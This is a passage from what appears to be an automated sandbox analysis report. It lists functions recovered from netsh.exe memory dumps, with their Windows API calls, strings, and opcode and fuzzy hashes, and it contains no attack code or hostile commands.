              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 0-871070163
              • Opcode ID: 8257d740a266ef8b6851536985c8a7cef2b84cee41e3a8cba30d7df620a3679f
              • Instruction ID: 1eb8360af4e4c8807a20b8e51dcfaf8c111e1ce9020effaa694cf6e6f3cb73b4
              • Opcode Fuzzy Hash: 8257d740a266ef8b6851536985c8a7cef2b84cee41e3a8cba30d7df620a3679f
              • Instruction Fuzzy Hash: FB41E2357047029FC721EE25CC41B6AB7E5EF88720F140A2EF996DB281DB31E8058BB1
              Function 01562DE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123windowCOMMON
              Download Yara Rule
              APIs
              • PrintMessage.NETSH(%1!s!,?), ref: 01562F05
                • Part of subcall function 01567241: _wcsicmp.MSVCRT ref: 01567267
                • Part of subcall function 01567241: _wcsicmp.MSVCRT ref: 01567287
                • Part of subcall function 01567241: _wcsicmp.MSVCRT ref: 015672B0
              • PrintMessageFromModule.NETSH(00000065), ref: 01562E37
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              • PrintMessageFromModule.NETSH(00000064,?), ref: 01562F1A
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: MessagePrint_wcsicmp$FromModule$AddressLoadProcString
              • String ID: %1!s!
              • API String ID: 3716039470-1485915839
              • Opcode ID: 2f6ea197613e495ba6a8bc9a29b109ae02ad53ffcb9d9c39d6f15f56851f067b
              • Instruction ID: ccf25841f68005d3d5cacf1bfe1a2c7c3932a3f93b689271ad142f81b25c96d5
              • Opcode Fuzzy Hash: 2f6ea197613e495ba6a8bc9a29b109ae02ad53ffcb9d9c39d6f15f56851f067b
              • Instruction Fuzzy Hash: 8C41243560011A8FCB21EF64DC91AAEB37AFF94310F1181A9DB0A6F254CB31AD54CBD9
              Function 00D8B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
              Download Yara Rule
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DC728C
              Strings
              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00DC7294
              • RTL: Resource at %p, xrefs: 00DC72A3
              • RTL: Re-Waiting, xrefs: 00DC72C1
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 885266447-605551621
              • Opcode ID: b511b6fd750fc25fc145e0993ddb6b45413d23af22368944110f941c9a1fdfc4
              • Instruction ID: 8394f9681d5e97a2ff9fdafd07df3399c0a6a84b8961069a5842a3c6c50c8266
              • Opcode Fuzzy Hash: b511b6fd750fc25fc145e0993ddb6b45413d23af22368944110f941c9a1fdfc4
              • Instruction Fuzzy Hash: 6B41F231704613ABC720DE25CC42F66B7A5FB54724F18061AF895EB281DB20E8069BF5
              Function 00E02300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: %%%u$]:%u
              • API String ID: 48624451-3050659472
              • Opcode ID: ef6ff55984bc854589c8ea3269a5e5234823ac86234fe4b8c3ba555b7640d256
              • Instruction ID: ce7620057b5d0db99bb326cbb06a6b07957a3a53f488efa8bb9e2ef1f82ce5e9
              • Opcode Fuzzy Hash: ef6ff55984bc854589c8ea3269a5e5234823ac86234fe4b8c3ba555b7640d256
              • Instruction Fuzzy Hash: F2318672A002199FCB20DF29CC45BEEB7F8EB54714F445559E949E3281EB349E858FA0
              Function 01568BE5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41registryCOMMON
              Download Yara Rule
              APIs
              • RegGetValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,System\CurrentControlSet\Services\RemoteAccess\Parameters,MultiTenancyEnabled,00000018,00000000,00000000,00000004), ref: 01568C30
              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000), ref: 01568C52
              Strings
              • MultiTenancyEnabled, xrefs: 01568C23
              • System\CurrentControlSet\Services\RemoteAccess\Parameters, xrefs: 01568C28
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: CloseValue
              • String ID: MultiTenancyEnabled$System\CurrentControlSet\Services\RemoteAccess\Parameters
              • API String ID: 3132538880-1071825540
              • Opcode ID: d6cad0ca300f7735eced3e3d7afcec5430b9dbf2c3716ec8158c78b1f8a7a259
              • Instruction ID: 76d75dae8e24ab14d84ca4d072041aaa99beb2cf538f2d3c2075d4809576e9f8
              • Opcode Fuzzy Hash: d6cad0ca300f7735eced3e3d7afcec5430b9dbf2c3716ec8158c78b1f8a7a259
              • Instruction Fuzzy Hash: CE014B71901218FBDB228B95E90ABDEBBB8FB04366F114164E911AA244D7708B5CEBD0
              Function 01564380 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40windowCOMMON
              Download Yara Rule
              APIs
              • MatchToken.NETSH(?,help), ref: 0156439F
                • Part of subcall function 01567690: _wcsnicmp.MSVCRT ref: 015676BC
              • MatchToken.NETSH(?,015612B0,?,help), ref: 015643B0
                • Part of subcall function 01563B75: _wcsicmp.MSVCRT ref: 01563BA6
                • Part of subcall function 01563B75: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,SOFTWARE\Microsoft\NetSh,00000000,STRING,00000000,000F003F,00000000,?,00000000), ref: 01563BE3
                • Part of subcall function 01563B75: _wcsdup.MSVCRT ref: 01563BF4
                • Part of subcall function 01563B75: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 01563C07
              • PrintMessageFromModule.NETSH(00000068,?,015612B0,?,help), ref: 015643CE
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: MatchToken$AddressCloseCreateFromLoadMessageModulePrintProcString_wcsdup_wcsicmp_wcsnicmp
              • String ID: help
              • API String ID: 611077269-143088812
              • Opcode ID: 502917dd1d7752505ca799359846dcf651abf31111e5b3aef123cfb4f7c7cd19
              • Instruction ID: 37bf6deac9e7671cb9f4e2ae1ef311f1e6b417fb6fd5ce6856b214060ace49e7
              • Opcode Fuzzy Hash: 502917dd1d7752505ca799359846dcf651abf31111e5b3aef123cfb4f7c7cd19
              • Instruction Fuzzy Hash: 91F04936300617AA9A126E9DA945D3E376DFB94224F004026F900DF150EB21EC61C7D2
              Function 01568060 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • OpenEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,NetshStopRefreshEvent), ref: 01568078
              • SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 01568085
              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 0156808C
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Event$CloseHandleOpen
              • String ID: NetshStopRefreshEvent
              • API String ID: 1560313832-639338441
              • Opcode ID: 5ee12e9c8e396d4ab8f3abd5489015d6c4a959fa22840ed28ea578cf43868297
              • Instruction ID: 47f1a55f9adab72547e2d6cb72d83e5e0a9aae82faa6c9d900574359d389066c
              • Opcode Fuzzy Hash: 5ee12e9c8e396d4ab8f3abd5489015d6c4a959fa22840ed28ea578cf43868297
              • Instruction Fuzzy Hash: 43E0C232591B24ABDB3266767C0EFAF7A9CAB48736F024424F729EF140CA70841582F4
              Function 015634FC Relevance: 6.3, APIs: 5, Instructions: 63memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?), ref: 01563522
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563529
              • memcpy.MSVCRT ref: 01563548
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156358E
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563595
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocFreememcpy
              • String ID:
              • API String ID: 3405790324-0
              • Opcode ID: d06dbd015da1cd08c42469fcc78f50be9e07c25b46d3852ff21140b42b18e8e6
              • Instruction ID: fac22a34efd301d10a5c00bd4335214b7f1db7035b19f025422c1f4c361d8c98
              • Opcode Fuzzy Hash: d06dbd015da1cd08c42469fcc78f50be9e07c25b46d3852ff21140b42b18e8e6
              • Instruction Fuzzy Hash: B8110BF1800105EFCB51CF64E80A959BBF9FB44324B024055EC18DF244D770E908EF90
              Function 0156412C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
              Download Yara Rule
              APIs
              • ConvertGuidToString.NETSH(?,?), ref: 0156417C
              • PrintMessageFromModule.NETSH(000000C8,?,?), ref: 0156419F
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              • PrintMessageFromModule.NETSH(000000C9), ref: 015641B6
              • PrintMessageFromModule.NETSH(000000CA,?), ref: 015641D3
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: FromMessageModulePrint$String$AddressConvertGuidLoadProc
              • String ID:
              • API String ID: 2510173387-0
              • Opcode ID: 37030f197afaac29ebc6c757f92958de38e556a3aecdcfcec85d5e6912839458
              • Instruction ID: 805009ec8aa8189d7986e65845223f15227ecc414637fed137aa934392e8acea
              • Opcode Fuzzy Hash: 37030f197afaac29ebc6c757f92958de38e556a3aecdcfcec85d5e6912839458
              • Instruction Fuzzy Hash: 64218072A0020ADFDB18DF64DC81CAEB7BDFBA4314B114129D919AF255EB31AD46CBC0
              Function 0156694A Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON
              Download Yara Rule
              APIs
              • _wfopen.MSVCRT ref: 01566969
              • PrintMessageFromModule.NETSH(0000006C,?,?,?,?,01562514), ref: 01566980
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 01566988
              • fclose.MSVCRT ref: 015669B7
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: AddressErrorFromLastLoadMessageModulePrintProcString_wfopenfclose
              • String ID:
              • API String ID: 2254135562-0
              • Opcode ID: 495b0b6a2950c0df7290e18b91f444530493aaa97bd774678804256e1b4b2727
              • Instruction ID: a427673b0d1ef76eecccac01587aee1e118e3a7cccd36549e6c817b16b5fed43
              • Opcode Fuzzy Hash: 495b0b6a2950c0df7290e18b91f444530493aaa97bd774678804256e1b4b2727
              • Instruction Fuzzy Hash: E501A7B2E00211ABD720DB6EF80585ABBEDF785674706402FF515DF208EB709D04ABD0
              Function 01567F40 Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
              Download Yara Rule
              APIs
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,?,00000000,?,00000000,?), ref: 01567F68
              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 01567F74
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 01567F7E
              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 01567F97
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: ErrorFormatFreeHandleLastLocalMessage
              • String ID:
              • API String ID: 1910557688-0
              • Opcode ID: 433ac53dd7f6b499c3ddf3b729994e0ac45ddcab5ce3fef7124a8219f25a06ce
              • Instruction ID: 7a70ee37c317981335324a4c84e8e1fd6c08fe4f5f28256d91c9cc92a60cb671
              • Opcode Fuzzy Hash: 433ac53dd7f6b499c3ddf3b729994e0ac45ddcab5ce3fef7124a8219f25a06ce
              • Instruction Fuzzy Hash: FEF03175910118FFDF169B94E809DEE7BBDFB48224F114255F92297240E7709F44DBA0
              Function 01569400 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 015699B8: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 015699BF
              • __set_app_type.MSVCRT ref: 01569412
              • __p__fmode.MSVCRT ref: 01569428
              • __p__commode.MSVCRT ref: 01569436
              • __setusermatherr.MSVCRT ref: 01569457
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
              • String ID:
              • API String ID: 1632413811-0
              • Opcode ID: c00765f416064b1474cfa8d4d23b08f3321ccf9e893ff38eec4e61602cb0fd07
              • Instruction ID: cf70e429b3c6e2bb85968b2787085c5e5955868644fb52ba22803a4a1fc3c472
              • Opcode Fuzzy Hash: c00765f416064b1474cfa8d4d23b08f3321ccf9e893ff38eec4e61602cb0fd07
              • Instruction Fuzzy Hash: 4DF0D4B05083439FC7786F70B44E5483BA8F79433AB12061DD4728F2D8CB7A8059EB60
              Function 00D97D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-
              • API String ID: 1302938615-2137968064
              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction ID: 81de4468c5a3e97719ca50edf6af0132c44021d3603fd50f94d9db8b8bd236ab
              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction Fuzzy Hash: 20919070E1821A9BDF24DF69C881ABEB7A5EF44720F68465AF855E72C0EB30DD409770
              Function 00D59126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID:
              • String ID: $$@
              • API String ID: 0-1194432280
              • Opcode ID: 37f37fdd7124950a745e4215b847fd39ee0cbf7ac737b0f48f61bfee29ac03a7
              • Instruction ID: 2a53435ed3d7c2bac5e800c7b2d00d7a03d05e894b8dcf4202e690d7d70c6735
              • Opcode Fuzzy Hash: 37f37fdd7124950a745e4215b847fd39ee0cbf7ac737b0f48f61bfee29ac03a7
              • Instruction Fuzzy Hash: E1811C76D00269DBDB31CB54CC55BEEB7B4AB09750F0441DAA91AB7280D7709E85CFB0
              Function 01567EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: AddressLoadProcString
              • String ID: GetResourceString
              • API String ID: 2390443819-1598891890
              • Opcode ID: 0244da047c18d1797c12ea91a8fdc83080894952c15a7687ae0edee93119d8c8
              • Instruction ID: f0e5388707e86eee2144c3b6b3f05d7044c210776e51439c0ebf1243bcbbabdf
              • Opcode Fuzzy Hash: 0244da047c18d1797c12ea91a8fdc83080894952c15a7687ae0edee93119d8c8
              • Instruction Fuzzy Hash: 1701C83560011D9BDB219F18DC40DAEB7BDFB94664F0181A5E915EB204EE30DD088FD0
              Function 01564CC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38registryCOMMON
              Download Yara Rule
              APIs
              • memset.MSVCRT ref: 01564CDC
              • RegisterContext.NETSH(?), ref: 01564D22
                • Part of subcall function 015645E0: wcschr.MSVCRT ref: 01564620
                • Part of subcall function 015645E0: wcschr.MSVCRT ref: 01564635
                • Part of subcall function 015645E0: wcschr.MSVCRT ref: 01564675
                • Part of subcall function 015645E0: wcschr.MSVCRT ref: 01564685
                • Part of subcall function 015645E0: PrintMessageFromModule.NETSH(000000B5,?), ref: 0156469E
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: wcschr$ContextFromMessageModulePrintRegistermemset
              • String ID: netsh
              • API String ID: 1453721150-4166728403
              • Opcode ID: 44cf3ccde5ffc4cb8e9abd59e952806de65391085250b2c0cd615a2c625fa125
              • Instruction ID: 920cfc9e8828ded8730f8de8375a926506d13aee8c257b163b70aee410b45c09
              • Opcode Fuzzy Hash: 44cf3ccde5ffc4cb8e9abd59e952806de65391085250b2c0cd615a2c625fa125
              • Instruction Fuzzy Hash: BF0119B1E002199BCB10DF95C848BDEBBF8BB95318F104419D814AF240D7B55A0ACBA9
              Function 015651C6 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 01565EB0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000000C,?,00000000,?,?,?,?,015651DC,?,?,?,01564B22,?,?,?), ref: 01565D5D
                • Part of subcall function 01565EB0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,015651DC,?,?,?,01564B22,?,?,?,?,?), ref: 01565D64
                • Part of subcall function 01565EB0: PrintMessageFromModule.NETSH(00000068,?,?,015651DC,?,?,?,01564B22,?,?,?,?,?), ref: 01565E91
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00000000,?,?,?,?,01564B22,?,?,?,?,?), ref: 0156525B
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564B22,?,?,?,?,?), ref: 01565262
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,?,?,?,01564B22,?,?,?,?,?), ref: 01565286
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564B22,?,?,?,?,?), ref: 0156528D
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Alloc$FreeFromMessageModulePrint
              • String ID:
              • API String ID: 206731548-0
              • Opcode ID: bf09bf30c3fecbe1a841659cacbacc67038bb166555aca7d8457eeff52ee932c
              • Instruction ID: a2b91806fd3b148b0ad253c215020c651318c041913f18b347c4ee7338bf35e3
              • Opcode Fuzzy Hash: bf09bf30c3fecbe1a841659cacbacc67038bb166555aca7d8457eeff52ee932c
              • Instruction Fuzzy Hash: DC31D8316602029BCB259FA8C4846AEB7E9FF44394B588518F90ADF201F731E945C7D0
              Function 015652BD Relevance: 5.1, APIs: 4, Instructions: 76memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,01564EFC,?,00000001,?,?,015684AB,00000000,?,?), ref: 015652ED
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564EFC,?,00000001,?,?,015684AB,00000000,?,?,?,01564CB5,?,00000002,?), ref: 015652F4
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,01564EFC,?,00000001,?,?,015684AB,00000000,?), ref: 0156533C
              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564EFC,?,00000001,?,?,015684AB,00000000,?,?,?,01564CB5,?,00000002,?), ref: 01565343
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$AllocProcess
              • String ID:
              • API String ID: 1617791916-0
              • Opcode ID: b281bf8372cd506c0d9155db83cb3f63765e8e4bc11365ef5cdaddda0f1255a6
              • Instruction ID: 23832820c302f777321bfb30f09595748b0b640a41d451e8bc3e888e179cf104
              • Opcode Fuzzy Hash: b281bf8372cd506c0d9155db83cb3f63765e8e4bc11365ef5cdaddda0f1255a6
              • Instruction Fuzzy Hash: 40210236750101DBCB269F6DDC498ABB7ACFF846503594929ED0ACB204F671AD06CBA0
              Function 01566706 Relevance: 5.1, APIs: 4, Instructions: 60memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,?,?,00000003), ref: 0156673C
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566743
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000001,00000000,?,?,00000003), ref: 0156674F
              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566756
              Memory Dump Source
